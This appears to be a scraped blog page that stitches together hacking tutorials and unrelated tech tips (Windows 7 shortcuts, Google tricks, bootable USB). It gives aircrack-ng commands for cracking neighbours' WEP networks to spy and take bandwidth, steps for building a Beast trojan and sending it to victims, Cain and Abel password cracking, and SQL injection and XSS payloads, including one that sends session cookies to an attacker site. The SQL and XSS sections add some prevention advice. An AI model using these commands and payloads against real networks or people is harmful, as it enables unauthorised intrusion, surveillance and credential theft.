Hack Wi-Fi: Cracking WEP Passwords with Aircrack-Ng

Welcome back, my rookie hackers!

When Wi-Fi was first developed and popularized in the late '90s, security was not a major concern. Unlike wired connections, anyone could simply connect to a Wi-Fi access point (AP) and steal bandwidth, or worse—sniff the traffic.

The first attempt at securing these access points was termed Wired Equivalent Privacy, or simply WEP. This encryption method has been around for quite awhile and a number of weaknesses have been discovered. It has been largely replaced by WPA and WPA2.

Despite these known weaknesses, there are still a significant number of these legacy APs in use. I was recently (July 2013) working at a major U.S. Department of Defense contractor in Northern Virginia, and in that building, probably a quarter of the wireless APs were still using WEP!

Apparently, a number of home users and small businesses bought their APs years ago, have never upgraded, and don't realize or don't care about its lack of security.

The flaws in WEP make it susceptible to various statistical cracking techniques. WEP uses RC4 for encryption, and RC4 requires that the initialization vectors (IVs) be random. The implementation of RC4 in WEP repeats that IV about every 6,000 frames. If we can capture enough of the IVs, we can decipher the key!

Now, you might be asking yourself, "Why would I want to hack Wi-Fi when I have my own Wi-Fi router and access?" The answer is multi-fold.

First, if you hack someone else's Wi-Fi router, you can navigate around the web anonymously, or more precisely, with someone else's IP address. Second, once you hack the Wi-Fi router, you can decrypt their traffic and use a sniffing tool like Wireshark or tcpdump to capture and spy on all of their traffic. Third, if you use torrents to download large files, you can use someone else's bandwidth, rather than your own.

Let's take a look at cracking WEP with the best wireless hacking tool available, aircrack-ng! Hacking wireless is one of my personal favorites!

Step 1: Open Aircrack-Ng in BackTrack

Let's start by firing up BackTrack and make certain that our wireless adapteris recognized and operational.

• iwconfig

Let's note that our wireless adapter is recognized by BackTrack and is renamed wlan0. Yours may be wlan1 or wlan2.

Step 2: Put the Wireless Adapter into Monitor Mode

Next, we need to put the wireless adapter into monitor or promiscuous mode. We can do that by typing:

• airmon-ng start wlan0

Note that the interface's name has been changed to mon0 by airmon-ng.

Step 3: Start Capturing Traffic

We now need to start capturing traffic. We do this by using the airodump-ng command with the monitoring interface, mon0.

• airodump-ng mon0

As we can see, we are now able to see all the APs and clients within our range!

Step 4: Start a Specific Capture on the AP

As you can see from the screenshot above, there are several APs with WEP encryption. Let's target the second one from the top with the ESSID of "wonderhowto." Let's copy the BSSID from this AP and begin a capture on that AP.

• airodump-ng --bssid 00:09:5B:6F:64:1E -c 11 -w WEPcrack mon0

This will start capturing packets from the SSID "wonderhowto" on channel 11 and write them to file WEPcrack in the pcap format. This command alone will now allow us to capture packets in order to crack the WEP key, if we are VERY patient.

But we're not patient, we want it now! We want to crack this key ASAP, and to do that, we will need to inject packets into the AP.

We now need to wait for someone to connect to the AP so that we can get the MAC address from their network card. When we have their MAC address, we can spoof their MAC and inject packets into their AP. As we can see at the bottom of the screenshot, someone has connected to the "wonderhowto" AP. Now we can hasten our attack!

Step 5: Inject ARP Traffic

To spoof their MAC and inject packets, we can use the aireplay-ng command. We need the BSSID of the AP and the MAC address of the client who connected to the AP. We will be capturing an ARP packet and then replaying that ARP thousands of times in order to generate the IVs that we need to crack WEP.

• aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 mon0

Now when we inject the ARPs into the AP, we will capture the IVs that are generated in our airodump file WEPcrack.

Step 6: Crack the Password

Once we have several thousand IVs in our WEPcrack file, all we need to do is run that file against aircrack-ng, such as this:

• aircrack-ng WEPcrack-01.cap

If we have enough IVs, aircrack-ng will display the key on our screen, usually in hexadecimal format. Simply take that hex key and apply it when logging into the remote AP and you have free wireless!

Read More

Top 10 Windows 7 tips

Windows 7 keyboard shortcuts

Use the below Windows 7 keyboard shortcuts to make the most of your Windows 7 experience.

Windows key and the arrow keys

Pressing the Windows key and Left or Right arrow keys will dock the window your viewing to the left or right-hand side of the screen. Pressing the Windows key and the Up arrow will maximize a window and pressing the Windows key and the Down arrow will resize and then minimize the window.

Use Shift: To stretch a window vertically, press the Windows key + Shift + the Up arrow. If you have multiple monitors use the Windows key + Shift + the Left or Right arrow keys to move the window to another monitor.

Windows key and plus and minus keys

If you ever need to zoom in or out of what is being displayed on your screen press the Windows key and the + (plus) or – (minus) keys. Pressing the plus zooms in and once zoomed in the minus will zoom out.

Clear all background programs

If you are not viewing a window in full screen and have other windows open in the background clear all background open windows by pressing the Windows key + theHome key.

• Full listing of computer shortcuts

Use the Windows 7 search

Find and run anything in Windows by using the Windows 7 search box. Click the Start orb or press then Windows key and type the name of the program you wish to run or file you wish to edit. Windows 7 will usually do a good job at finding an exact match and simply pressing enter will execute that program or open that file. If more than one match is found, use the up and down arrow keys to select the file you wish to open and then press Enter.

Running as administrator: Some programs may require administrator mode in order to function properly. You can run any program as administrator from the search box by typing the name of the program you want to run and then instead of pressing Enter to run the program press Ctrl+Shift+Enter to run as administrator. If you want to click and run a program as administrator hold down the Ctrl+Shift and then click the icon.

Take full advantage of the Taskbar

Pin programs to the Taskbar

All programs can be pinned to the Taskbar and allow easy access to your favorite programs without having to use the Start Menu. To Pin a program to the Taskbar right-click on the program or shortcut to the program and in the menu choose the Pin to Taskbar option. Alternatively you can also drag the icon to the Taskbar.

If you want to remove a pinned program, right-click on the Taskbar icon and clickUnpin this program from the Taskbar. Alternatively you can also drag the icon off of the task bar and then click Unpin this program from the Taskbar.

Move the icons and pinned programs

Any pinned or opened program on the Taskbar can be moved and arranged. Left-click on any icon on the Taskbar and drag it to the location you want it to remain.

Windows key and a number

Pressing the Windows key and a number on the top row of your keyboard will open the Window corresponding to the open program on your Taskbar. For example, in the below picture of the Windows 7 Taskbar, Firefox i the first icon, Control panel is the second icon, and Adobe Photoshop is the third icon. If the Windows key + 3 was pressed, Adobe Photoshop would become the active window. To make it even easier arrange your icons (as mentioned above) from left to right by most frequently opened.

Pin your favorite folder

If you frequently access the same folder (e.g. your favorites, my documents, Dropbox, etc.) pin the folder to the Windows Explorer icon on the Taskbar. To do this drag your favorite folder to the Taskbar until you see Pin to Windows Explorer. Once pinned, right-click the Explorer icon to access that folder under the Pinned section.

Open a second instance

If you want to open a second instance or window of a program that is already open, press and hold the Shift key and then click the program icon on the Taskbar.

Get to the Desktop

Click the Desktop button on the far right edge of the Taskbar to get to the Desktop.

Customize the Notification area

Windows Vista and Windows 7 allow the Windows Notification area (aka Systray) to be modified. By default, many of the icons shown in the past are now hidden and give Windows a much cleaner look. Customize this area to make icons show or not show by clicking on the up arrow next to the icons and selecting Customize, as shown in the picture to the right. Once in Customize you can choose what programs show, don’t show, or only show notifications.

Improve the quality of your text

Use the Windows ClearType Text Tuner to improve the overall quality of all text you read on your screen. To start the ClearType Text Tuner click the Start Orb and typecttune.exe and press Enter.

Enable and disable Windows 7 features

Turn on and off Windows features by clicking Start, typing features and press enter. In the Programs and Features window on the left-hand column click Turn Windows features on or off and in the Windows Features box check or uncheck the features you want enabled or disabled.

Use the Reliability and Performance Monitor

View the reliability history of your computer by using the Reliability Monitor. Click the Start orb and type reliability and press enter for View Reliability History. In the Reliability Monitor, you’ll be able to view the overall reliability of your computer and be able to identify any past problems your computer has had.

If you want to view the performance of your computer in real time use the Performance Monitor. Click the Start orb and type performance and press enter for the Performance Monitor. In the Performance Monitor, you can view your computers performance in real time or view a log of your systems performance.

Re-enable underlined keyboard shortcuts

By default, Windows 7 has the underlines for keyboard shortcuts like those shown in the picture to the right disabled. To re-enable these underlines in all Windows programs follow the below steps.

1. Open the Control Panel
2. In the Control Panel click Ease of Access
3. In Ease of Access click Change how your keyboard works
4. Finally, check the Underline keyboard shortcuts and access keys and then click Ok.

Rename multiple files at once

To change the name of multiple files at once highlight all the files you wish to rename in Windows Explorer and press the F2 key. Type in the new name you wish to use for all files and press enter. Once done all files will be renamed to the name entered followed by a unique number.

Install Windows Essentials

Install missing Windows software by installing the free Windows Essentials software package that includes: Windows Live Family Safety, Windows Live Mail, Windows Live Messenger, SkyDrive for Windows, Windows Movie Maker, Windows Photo Gallery, Windows Live Writer, and Microsoft Outlook Hotmail Connector.

Read More

Top 10 Google Tricks

Below is a list of our top ten Google tricks many people who use Google don’t know about.

Definitions

Pull up the definition of the word by typing define followed by the word you want the definition for. For example, typing: define bravura would display the definition of that word.

Local search

Visit Google Local enter the area you want to search and the keyword of the place you want to find. For example, typing: restaurant at the above link would display local restaurants.

Phone number lookup

Enter a full phone number with area code to display the name and address associated with that phone number.

Find weather and movies

Type “weather” or “movies” followed by a zip code or city and state to display current weather conditions or movie theaters in your area. For example, typing weather 84101 gives you the current weather conditions for Salt Lake City, UT and the next four days. Typing movies 84101 would give you a link for show times for movies in that area.

Track airline flight and packages

Enter the airline and flight number to display the status of an airline flight and it’s arrival time. For example, type: delta 123 to display this flight information if available.

Google can also give a direct link to package tracking information if you enter a UPS, FedEx or USPS tracking number.

Translate

Translate text, a full web page, or search by using the Google Language Tools.

Pages linked to you

See what other web pages are linking to your website or blog by typing link: followed by your URL. For example, typing link:http://raju2047.blogspot.com displays all pages linking to Computer Hope.

Find PDF results only

Add fileType: to your search to display results that only match a certain file type. For example, if you wanted to display PDF results only type: “dell xps” fileType:pdf – this is a great way to find online manuals.

Calculator

Use the Google Search engine as a calculator by typing a math problem in the search. For example, typing: 100 + 200 would display results as 300.

Stocks

Quickly get to a stock quote price, chart, and related links by typing the stock symbol in Google. For example, typing: msft will display the stock information for Microsoft.

Read More

TRY THESE GOOGLE EASTER EGGS

Google Now brings awesome search functionality to our android devices . Apart from the usual information cards, there are many Easter egg surprises that make Google search even more fun.  The recent  holiday surprise from Android was the “let’s go caroling” search which would bring up a list of Christmas carol karaokes. In case you don’t know about other Google search easter eggs,  here is a list of some weird Google search voice commands :

Open “Google Now” aka “Google search” and say the following

• “Do a barrel roll”
• “Askew” or”Tilt”
• “What is the answer to life, the universe and everything?”
• “What’s the loneliest number?”
• “Make me a sandwich!”
• “Sudo, Make me a sandwich”
• “When am I?”
• “Who’s on first”
• “What is your favorite color?”
• “Who are you?”
• “What is the airspeed velocity of an unladen swallow?”
• “What is the nature of the universe?”
• “What is the answer to life, the universe and everything?”
• “How much wood could a woodchuck chuck if a woodchuck could chuck wood”
• What is (celebrity’s name)’s bacon number?”
• “Beam me up, Scotty!”
• “Let’s go caroling”

After each of these commands, you should get some witty answer or a fun karaoke -A little something to keep us android fans smiling.

Read More

How to make bootable USB without any software?

This tutorial will help you in creating a bootable USB drive of Windows Vista and 7 which you can use to install Vista and 7 in any system. It might become very useful when you don't have access to DVD drive.

Step 1: Insert your USB (4GB+ preferable) stick to the system and backup all the data from the USB as we are going to format the USB to make it as bootable.

Step 2: Open elevated Command Prompt. To do this, type in CMD in Start menu search field and hit Ctrl + Shift + Enter. Alternatively, navigate to Start > All programs >Accessories > right click on Command Prompt and select run as administrator.

Step 3: When the Command Prompt opens, enter the following command:

DISKPART and hit enter.

LIST DISK and hit enter.

Once you enter the LIST DISK command, it will show the disk number of your USB drive. In the below image my USB drive disk no is Disk 1.

Step 4: In this step you need to enter all the below commands one by one and hit enter. As these commands are self explanatory, you can easily guess what these commands do.

SELECT DISK 1 (Replace DISK 1 with your disk number)

CLEAN

CREATE PARTITION PRIMARY

SELECT PARTITION 1

ACTIVE

FORMAT FS=NTFS

(Format process may take few seconds)

ASSIGN

EXIT


Step 7: Copy Windows  contents to USB.

You are done with your bootable USB. You can now use this bootable USB as bootable DVD on any computer that comes with USB boot feature (most of the current motherboards support this feature).

(If in case it doesn't work)

Step 8: Insert your Windows DVD in the optical drive and note down the drive letter of the optical drive and USB media. Here I use “F” as my optical (DVD) drive letter and “H” as my USB drive letter.


Step 6: Go back to command prompt and execute the following commands:

F: and hit enter. Where “F” is your DVD drive letter.

CD BOOT and hit enter.

BOOTSECT.EXE/NT60 H:

(Where “H” is your USB drive letter)

if you do not have disk and you want to do this from hard drive of another computer where you have installation stuff then simply change the drive letter to
the one of your hard drive  where you have installation stuff

D:\Boot>BOOTSECT.EXE/NT60 H:
D Is the hard drive letter



Note that this bootable USB guide will not work if you are trying to make a bootable USB on XP computer.

Read More

Hack others computer using Beast trojan

Step 1:- Download the necessary software  Beast 2.07

Step 2:- Open the software

Step 3:- Now click on “Build server “button.

Step 4:- Now in this window click on the notifications tab.
Step 5:- In the notifications tab click on the e-mail button.
Step 6:- Now In this window fill your proper and valid email id

Step 7:- Now go to "AV-FW kill” tab.

Step 8: - Now In this put a tick mark on the “disable XP firewall ".

Step 9:-Now click on "EXE icon” tab.
Step 10:- Select any icon and click on the ”Save Server” button and the Trojan will be made.

 Step 11:-Now send this Trojan File to victim.

Step 12:- As and when the victim will install the Trojan on his system you will get a notification e-mail on your specified e-mail id while making the Trojan. This Email consists of the IP address and port of the victim.

Step 13:-Put This IP address and Port in the place shown in the below snap-shot.

Step 14:- After That Click on the "Go Beast” Button and You will be connected to victims PC.

Step 15:- Now select the action or task you want to execute on victims PC form the given list.

Step 16:- Now to destroy or kill the Trojan click on the “server “tab from the menu.

Step 17:-Now click on the “Kill Server “button and the Trojan will be destroyed from the victims PC.

 Step 18:- You are Done Now.

Read More

How to Hack Computer Password using Cain and Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

First download cain & abel software.

Open cain and abel click on cracker option.

 Select LM & NTLM Hashes and click “+” sign

Click on Next

I want to recover password of “raaz” user name then right click on raaz> Brute Force Attack > NTLM Hashes.

Now you will see window similar to below image. Click on start.

After successfully finished performing password recovery it will show you password like in the image below.

Read More

SQL Injections Attack with Examples

This article explains basics of SQL Injection with an example that shows SQL Injection, and provides methods to prevent from these attacks.

As the name suggests, this attack can be done with SQL queries. Many web developers are unaware of how an attacker can tamper with the SQL queries. SQL-Injection can be done on a web application which doesn’t filter the user inputs properly and trusts whatever the user provides. The idea of SQL injection is to make the application to run undesired SQL queries.

All the examples mentioned in this article are tested with the following:

• PHP 5.3.3-7
• Apache/2.2.16
• Postgresql 8.4

SQL Injection Example

Most of the web application has a login page. So we will start with that. Let us assume the following code was written by the application.

index.html:

<html>
<head><title>SQL Injection Demo</title></head>
 <body onload="document.getElementById('user_name').focus();" >
 <form name="login_form" id="login_form" method="post" action="login.php">
  <table border=0 align="center" >
   <tr>
    <td colspan=5 align="center" ><font face="Century Schoolbook L" > Login Page </font></td>
   </tr>
   <tr>
    <td> User Name:</td><td> <input type="text" size="13" id="user_name" name="user_name" value=""></td>
   </tr>
   <tr>
    <td> Password: </td><td> <input type="password" size="13" id="pass_word" name="pass_word" value=""></td>
   </tr>
   <tr>
    <td colspan=2 align="center"><input type="submit" value="Login"> </div></td>
   </tr>
  </table>
 </form>
</body>
</html>

When the user enters the user_name and pass_word, it will be posted to login.php via HTTP_POST method.

login.php:

<?php
$Host= '192.168.1.8';
$Dbname= 'john';
$User= 'john';
$Password= 'xxx';
$Schema = 'test'; 

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; 

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW); 

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
} 

$query="SELECT * from $Schema.users where user_name='".$_POST['user_name']."' and password='".$_POST['pass_word']."';"; 

$result=pg_query($Connect,$query);
$rows = pg_num_rows($result);
if ($rows) {
 echo "Login Success";
}
else {
 echo "Login Failed";
}
?>

The line number 19 in the above code is vulnerable to SQL-Injection (i.e the line that starts with “$query=”SELECT *..”). The SQL query is designed to match the given username and password with the database. It will work properly if the user provides valid username and password. But an attacker can craft the input as follows:

In username field, instead of providing a username the attcker can enter the following.

' or 1=1;--

The attacker than then leave the password field be empty.

When the attacker clicks submit, the details will be posted to login.php. In login.php the query will be framed as follows:

SELECT * from test.members where user_name='' or 1=1;--' and password='';

The above one is a valid SQL query. In postgresql – is the comment character. So the statements after – will be treated as comments and it will not be executed. Now the postgresql will execute

select * from test.members where user_name='' or 1=1;

This will return true and give “Login Success” message.

If the attacker knows the database tables name, then he can even drop those tables by giving the following input in the username field.

';drop table test.lop;--

Some login application, tends to do the following.

• Stored the password as md5 in the database
• First select the username,password from the database based on the username provided.
• Then md5 the password given by the user, and compare it with the password got from database.
• If both are matched, then login is success.

Let’s see how we can bypass that if the query is vulnerable to SQL-Injection.

login.php:

$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';"; 

$result=pg_query($Connect,$query); 

$row=pg_fetch_array($result,NULL,PGSQL_ASSOC); 

# Find the md5 for the user supplied password.
$user_pass = md5($_POST['pass_word']); 

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login Failed\n";
}
else {
 echo "Login Success\n";
}

Now enter the following in the username field

' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70

Enter “123” in the password field and click submit. md5(123) is 202cb962ac59075b964b07152d234b70

Now the query would expand as follows:

SELECT user_name,password from test.members where user_name='' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70';

When the above query is executed, the database will return ‘laksh’ as the username and ‘ 202cb962ac59075b964b07152d234b70′ as password.

We also posted “123” in the pass_word field. So the strcmp will return 0 and the authentication will be success.

The above are just couple of examples of SQL injection attacks. There are lot of these variations. Following are some of the things you can do to reduce the possibility of SQL-Injection attacks.

• Strict type checking ( Don’t trust what the user enters )
• If you expect user name to be entered, then validate whether it contains only alpha numerals.
• Escape or filter the special characters and user inputs.
• Use prepared statements to execute the queries.
• Don’t allow multiple queries to be executed on a single statement.
• Don’t leak the database information to the end user by displaying the “syntax errors”, etc.

Read More

Cross-site Scripting with Examples

In the previous article of this series, we explained how to prevent from SQL-Injection attacks. In this article we will see a different kind of attack called XXS attacks.

XSS stands for Cross Site Scripting.

XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Types of Cross Site Scripting

XSS attacks are broadly classified into 2 types:

Non-Persistent
Persistent

1. Non-Persistent XSS Attack

In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visit the link, the crafted code will get executed by the user’s browser. Let us understand this attack better with an example.

Example for Non-Persistent XSS

index.php:

<?php
$name = $_GET['name'];
echo "Welcome $name<br>";
echo "<a href="http://xssattackexamples.com/">Click to Download</a>";
?>

Example 1:
Now the attacker will craft an URL as follows and send it to the victim:

index.php?name=guest<script>alert('attacked')</script>

When the victim load the above URL into the browser, he will see an alert box which says ‘attacked’. Even though this example doesn’t do any damage, other than the annoying ‘attacked’ pop-up, you can see how an attacker can use this method to do several damaging things.

Example 2:

For example, the attacker can now try to change the “Target URL” of the link “Click to Download”. Instead of the link going to “xssattackexamples.com” website, he can redirect it to go “not-real-xssattackexamples.com” by crafting the URL as shown below:

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>

In the above, we called the function to execute on “window.onload”. Because the website (i.e index.php) first echos the given name and then only it draws the <a> tag. So if we write directly like the one shown below, it will not work, because those statements will get executed before the <a> tag is echoed

index.php?name=<script>var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com"</script>

Normally an attacker tends not to craft the URL which a human can directly read. So he will encode the ASCII characters to hex as follows.

index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

which is same as

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>

Now the victim may not know what it is, because directly he cannot understand that the URL is crafted and their is a more chance that he can visit the URL.

2. Persistent XSS Attack

In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user’s session by performing XSS.

Session

HTTP protocol is a stateless protocol, which means, it won’t maintain any state with regard to the request and response. All request and response are independent of each other. But most of the web application don’t need this. Once the user has authenticated himself, the web server should not ask the username/password for the next request from the user. To do this, they need to maintain some kind of states between the web-browser and web-server which is done through the “Sessions”.

When the user login for the first time, a session ID will be created by the web server and it will be sent to the web-browser as “cookie”. All the sub-sequent request to the web server, will be based on the “session id” in the cookie.

Examples for Persistent XSS Attack

This sample web application we’ve given below that demonstrates the persistent XSS attack does the following:

There are two types of users: “Admin” and “Normal” user.

• When “Admin” log-in, he can see the list of usernames. 
• When “Normal” users log-in, they can only update their display name.

login.php:

<?php
$Host= '192.168.1.8';
$Dbname= 'app';
$User= 'yyy';
$Password= 'xxx';
$Schema = 'test';

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
}

$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';";

$result=pg_query($Connect,$query);
$row=pg_fetch_array($result,NULL,PGSQL_ASSOC);

$user_pass = md5($_POST['pass_word']);
$user_name = $row['user_name'];

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login failed";
}
else {
 # Start the session
 session_start();
 $_SESSION['USER_NAME'] = $user_name;
 echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>";
}
?>

home.php

<?php
session_start();
if(!$_SESSION['USER_NAME']) {
 echo "Need to login";
}
else {
 $Host= '192.168.1.8';
 $Dbname= 'app';
 $User= 'yyy';
 $Password= 'xxx';
 $Schema = 'test';
 $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
 $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);
 if($_SERVER['REQUEST_METHOD'] == "POST") {
  $query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';";
  pg_query($Connect,$query);
  echo "Update Success";
 }
 else {
  if(strcmp($_SESSION['USER_NAME'],'admin')==0) {
   echo "Welcome admin<br><hr>";
   echo "List of user's are<br>";
   $query = "select display_name from $Schema.members where user_name!='admin'";
   $res = pg_query($Connect,$query);
   while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
    echo "$row[display_name]<br>";
   }
 }
 else {
  echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">";
  echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">";
  echo "<input type=\"submit\" value=\"Update\">";
 }
}
}
?>

Now the attacker log-in as a normal user, and he will enter the following in the textbox as his display name:

<a href=# onclick=\"document.location=\'http://not-real-xssattackexamples.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Name</a>

The above information entered by the attacker will be stored in the database (persistent).

Now, when the admin log-in to the system, he will see a link named “My Name” along with other usernames. When admin clicks the link, it will send the cookie which has the session ID, to the attacker’s site. Now the attacker can post a request by using that session ID to the web server, and he can act like “Admin” until the session is expired. The cookie information will be something like the following:

xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3

Once the hacker knows the PHPSESSID, he can use this session to get the admin privilege until PHPSESSID expires.

To understand this more, we can use a firefox addon called “Tamper Data”, which can be used to add a new HTTP header called “Cookies” and set the value to “PHPSESSID=vmcsjsgear6gsogpu7o2imr9f3″.

Read More